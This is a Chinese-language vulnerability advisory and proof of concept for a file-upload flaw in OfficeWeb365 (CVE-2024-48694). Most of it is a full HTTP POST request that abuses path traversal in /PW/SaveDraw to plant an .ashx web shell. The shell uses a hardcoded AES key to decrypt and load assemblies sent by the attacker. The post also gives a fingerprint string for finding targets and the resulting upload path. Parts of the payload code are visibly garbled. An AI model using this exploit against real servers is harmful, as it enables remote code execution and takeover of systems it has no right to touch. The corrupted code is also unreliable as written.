漏洞描述

OfficeWeb365 v.8.6.1.0和v7.18.23.0中的文件上传漏洞允许远程攻击者通过pw/savedraw组件执行任意代码。

影响版本：

V8.6.1.0； V7.18.23.0

网络测绘

“OfficeWeb365”

漏洞信息

POST /PW/SaveDraw?path=../../Content/img&idx=6.ashx HTTP/1.1
Host: *****
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.434.18 Safari/537.36
Content-Length: 990
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: closedata:image/png;base64,01s34567890123456789y12345678901234567m91<%@ WebHandler Language="C#" Class="Handler" %>using System;using System.I0;using System.Reflection;using System.Text;using System.Web;using System.WebSessionState;using&System.Security.Cryptography;public class Handler : IHttpHandler,IRequiresSessionState{public void=&ProcessRequest(HttpContext context){try{string key="900bc885d7553375";byteDk=&Encoding.Default.GetBytes(key);context.Session.AddC"sky", key);StreamReader sr=new&StreamReader(contextRequest.InputStream);string line=sr.ReadLine;if(!string.IsNullOrEmpty(line)){byteDc=&Convert.FromBase64String(line);Assembly assembly=&typeof(Environment).Assembly;RijndaelManaged rm=(RijndaelManaged)&assembly.CreateInstance("System.Secur"+"ityCrypto"+"graphy.Rijnda"+"elm anaged");byte[ data=rm.CreateDecryptorCk,k)TransformFinalBlock(c,0, c.Length);Assembly.Load(data)CreateInstance("U").Equals(context);sr.clo se();}}catch {}}public bool IsReusable{get{return false;}}}}---

上传地址

/Content/img/UserDraw/drawPW6.ashx

参考：https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48694

免责声明 

文章及相关内容仅限于合法合规的安全研究与技术学习用途。任何用户因将工具或相关信息用于其他用途而引发的法律后果或连带责任，均由使用者自行承担，作者及发布者对此不承担任何形式的法律责任或连带责任。本文仅分享来源于公开渠道的漏洞 POC，旨在促进学术研究与技术交流，不对因信息使用而导致的任何直接或间接后果、损失或风险承担责任。如本内容存在侵犯他人合法权益的情形，请立即与作者联系，作者将尽快采取必要措施予以删除并致以歉意。